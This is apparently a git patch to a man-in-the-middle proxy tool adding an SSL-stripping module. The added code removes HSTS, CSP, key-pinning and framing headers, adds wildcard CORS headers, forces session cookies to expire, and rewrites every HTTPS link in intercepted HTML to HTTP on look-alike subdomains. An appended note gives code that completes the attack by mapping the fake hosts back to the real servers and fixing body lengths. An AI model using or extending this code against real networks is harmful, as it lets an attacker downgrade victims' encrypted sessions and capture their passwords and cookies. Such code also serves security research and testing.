From 62112b0ae40f211014a6925713b1b1a26ce9e27c Mon Sep 17 00:00:00 2001
From: evilsocket
Date: Thu, 8 Mar 2018 20:28:12 +0100
Subject: [PATCH] stripping is done, only resolution of fake domains is needed
 (ref #154)

---
 modules/http_proxy_base_filters.go    |   2 +
 modules/http_proxy_base_sslstriper.go | 133 ++++++++++++++++++++++----
 2 files changed, 117 insertions(+), 18 deletions(-)

diff --git a/modules/http_proxy_base_filters.go b/modules/http_proxy_base_filters.go
index b2816669..acf52d0e 100644
--- a/modules/http_proxy_base_filters.go
+++ b/modules/http_proxy_base_filters.go
@@ -54,6 +54,8 @@ func (p *HTTPProxy) onResponseFilter(res *http.Response, ctx *goproxy.ProxyCtx)
 	req := res.Request
 	log.Debug("(%s) > %s %s %s%s", core.Green(p.Name), req.RemoteAddr, req.Method, req.Host, req.URL.Path)
 
+	p.stripper.Process(res, ctx)
+
 	// do we have a proxy script?
 	if p.Script == nil {
 		return res
diff --git a/modules/http_proxy_base_sslstriper.go b/modules/http_proxy_base_sslstriper.go
index e095e03f..cd30301a 100644
--- a/modules/http_proxy_base_sslstriper.go
+++ b/modules/http_proxy_base_sslstriper.go
@@ -2,7 +2,9 @@ package modules
 
 import (
 	"fmt"
+	"io/ioutil"
 	"net/http"
+	"regexp"
 	"strings"
 	"sync"
 
@@ -13,6 +15,16 @@ import (
 	"github.com/jpillora/go-tld"
 )
 
+var (
+	httpsLinksParser = regexp.MustCompile(`https://[^"'/]+`)
+	subdomains       = map[string]string{
+		"www":     "wwwww",
+		"webmail": "wwebmail",
+		"mail":    "wmail",
+		"m":       "wmobile",
+	}
+)
+
 type cookieTracker struct {
 	sync.RWMutex
 	set map[string]bool
 }
@@ -63,15 +75,13 @@ func (t *cookieTracker) IsClean(req *http.Request) bool {
 	return false
 }
 
-func (t *cookieTracker) track(req *http.Request) {
+func (t *cookieTracker) Track(req *http.Request) {
 	t.Lock()
 	defer t.Unlock()
 	t.set[t.keyOf(req)] = true
 }
 
-func (t *cookieTracker) TrackAndExpire(req *http.Request, ctx *goproxy.ProxyCtx) *http.Response {
-	t.track(req)
-
+func (t *cookieTracker) Expire(req *http.Request) *http.Response {
 	domain := t.domainOf(req)
 	redir := goproxy.NewResponse(req, "text/plain", 302, "")
@@ -98,6 +108,35 @@ func NewSSLStripper(enabled bool) *SSLStripper {
 	}
 }
 
+func (s *SSLStripper) stripRequestHeaders(req *http.Request) {
+	req.Header.Del("Accept-Encoding")
+	req.Header.Del("If-None-Match")
+	req.Header.Del("If-Modified-Since")
+	req.Header.Del("Upgrade-Insecure-Requests")
+
+	req.Header.Set("Pragma", "no-cache")
+}
+
+func (s *SSLStripper) stripResponseHeaders(res *http.Response) {
+	res.Header.Del("Content-Security-Policy-Report-Only")
+	res.Header.Del("Content-Security-Policy")
+	res.Header.Del("Strict-Transport-Security")
+	res.Header.Del("Public-Key-Pins")
+	res.Header.Del("Public-Key-Pins-Report-Only")
+	res.Header.Del("X-Frame-Options")
+	res.Header.Del("X-Content-Type-Options")
+	res.Header.Del("X-WebKit-CSP")
+	res.Header.Del("X-Content-Security-Policy")
+	res.Header.Del("X-Download-Options")
+	res.Header.Del("X-Permitted-Cross-Domain-Policies")
+	res.Header.Del("X-Xss-Protection")
+
+	res.Header.Set("Allow-Access-From-Same-Origin", "*")
+	res.Header.Set("Access-Control-Allow-Origin", "*")
+	res.Header.Set("Access-Control-Allow-Methods", "*")
+	res.Header.Set("Access-Control-Allow-Headers", "*")
+}
+
 // sslstrip preprocessing, takes care of:
 //
 // - patching / removing security related headers
@@ -108,26 +147,84 @@ func (s *SSLStripper) Preprocess(req *http.Request, ctx *goproxy.ProxyCtx) (redi
 		return
 	}
 
-	// preeprocess headers
-	req.Header.Set("Pragma", "no-cache")
-	for name, _ := range req.Header {
-		if name == "Accept-Encoding" {
-			req.Header.Del(name)
-		} else if name == "If-None-Match" {
-			req.Header.Del(name)
-		} else if name == "If-Modified-Since" {
-			req.Header.Del(name)
-		} else if name == "Upgrade-Insecure-Requests" {
-			req.Header.Del(name)
-		}
-	}
+	// preprocess request headers
+	s.stripRequestHeaders(req)
 
 	// check if we need to redirect the user in order
 	// to make unknown session cookies expire
 	if s.cookies.IsClean(req) == false {
 		log.Info("[%s] Sending expired cookies for %s to %s", core.Green("sslstrip"), core.Yellow(req.Host), req.RemoteAddr)
-		redir = s.cookies.TrackAndExpire(req, ctx)
+		s.cookies.Track(req)
+		redir = s.cookies.Expire(req)
 	}
 
 	return
 }
+
+func (s *SSLStripper) isHTML(res *http.Response) bool {
+	for name, values := range res.Header {
+		for _, value := range values {
+			if name == "Content-Type" {
+				return strings.HasPrefix(value, "text/html")
+			}
+		}
+	}
+
+	return false
+}
+
+func (s *SSLStripper) processURL(url string) string {
+	// first we remove the https schema
+	url = strings.Replace(url, "https://", "http://", 1)
+
+	// search for a known subdomain and replace it
+	found := false
+	for sub, repl := range subdomains {
+		what := fmt.Sprintf("://%s", sub)
+		with := fmt.Sprintf("://%s", repl)
+		if strings.Contains(url, what) {
+			url = strings.Replace(url, what, with, 1)
+			found = true
+			break
+		}
+	}
+	// fallback
+	if found == false {
+		url = strings.Replace(url, "://", "://wwww.", 1)
+	}
+
+	return url
+}
+
+func (s *SSLStripper) Process(res *http.Response, ctx *goproxy.ProxyCtx) {
+	if s.Enabled == false {
+		return
+	} else if s.isHTML(res) == false {
+		return
+	}
+
+	// process response headers
+	// s.stripResponseHeaders(res)
+
+	// fetch the HTML body
+	raw, err := ioutil.ReadAll(res.Body)
+	if err != nil {
+		log.Error("Could not read response body: %s", err)
+		return
+	}
+
+	body := string(raw)
+	urls := make(map[string]string, 0)
+	matches := httpsLinksParser.FindAllString(body, -1)
+	for _, url := range matches {
+		urls[url] = s.processURL(url)
+	}
+
+	for url, stripped := range urls {
+		log.Info("Stripping url %s to %s", core.Bold(url), core.Yellow(stripped))
+		body = strings.Replace(body, url, stripped, -1)
+	}
+
+	// reset the response body to the original unread state
+	res.Body = ioutil.NopCloser(strings.NewReader(body))
+}
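
Note on the remaining work: the subject line leaves "resolution of fake domains" (ref #154) open. processURL() maps e.g. https://mail.example.com to http://wmail.example.com, so something on the request path still has to recognize those prefixed hosts and map them back to the real upstream before forwarding. A minimal sketch of that reverse lookup, assuming a hypothetical unprocessHost() helper; the name and placement are illustrative only, not part of this patch:

    package main

    import (
    	"fmt"
    	"strings"
    )

    // same table this patch introduces in http_proxy_base_sslstriper.go
    var subdomains = map[string]string{
    	"www":     "wwwww",
    	"webmail": "wwebmail",
    	"mail":    "wmail",
    	"m":       "wmobile",
    }

    // unprocessHost is hypothetical: it maps a stripped hostname such as
    // "wmail.example.com" back to "mail.example.com" so the proxy can
    // contact the real (HTTPS) upstream.
    func unprocessHost(host string) string {
    	for sub, repl := range subdomains {
    		if strings.HasPrefix(host, repl+".") {
    			return sub + strings.TrimPrefix(host, repl)
    		}
    	}
    	// fallback mirrors processURL's "://wwww." default
    	return strings.TrimPrefix(host, "wwww.")
    }

    func main() {
    	fmt.Println(unprocessHost("wmail.example.com")) // mail.example.com
    	fmt.Println(unprocessHost("wwwww.example.com")) // www.example.com
    	fmt.Println(unprocessHost("wwww.example.com"))  // example.com
    }

Matching on the host prefix instead of a plain strings.Contains avoids an ambiguity present on the forward path: with Contains, "://m" also matches "://mail.example.com", so which replacement wins can depend on map iteration order.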
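
One more caveat in Process(): the rewritten body usually differs in length from the original, but the response still carries the upstream Content-Length, so clients may truncate or stall while reading it. A hedged sketch of the adjustment, assuming a helper named resetBody() (hypothetical, not in this commit) living in the same package:

    package modules

    import (
    	"io/ioutil"
    	"net/http"
    	"strconv"
    	"strings"
    )

    // resetBody swaps in the rewritten HTML and refreshes the now-stale
    // Content-Length so the client reads exactly the new body.
    func resetBody(res *http.Response, body string) {
    	res.Body = ioutil.NopCloser(strings.NewReader(body))
    	res.ContentLength = int64(len(body))
    	res.Header.Set("Content-Length", strconv.Itoa(len(body)))
    }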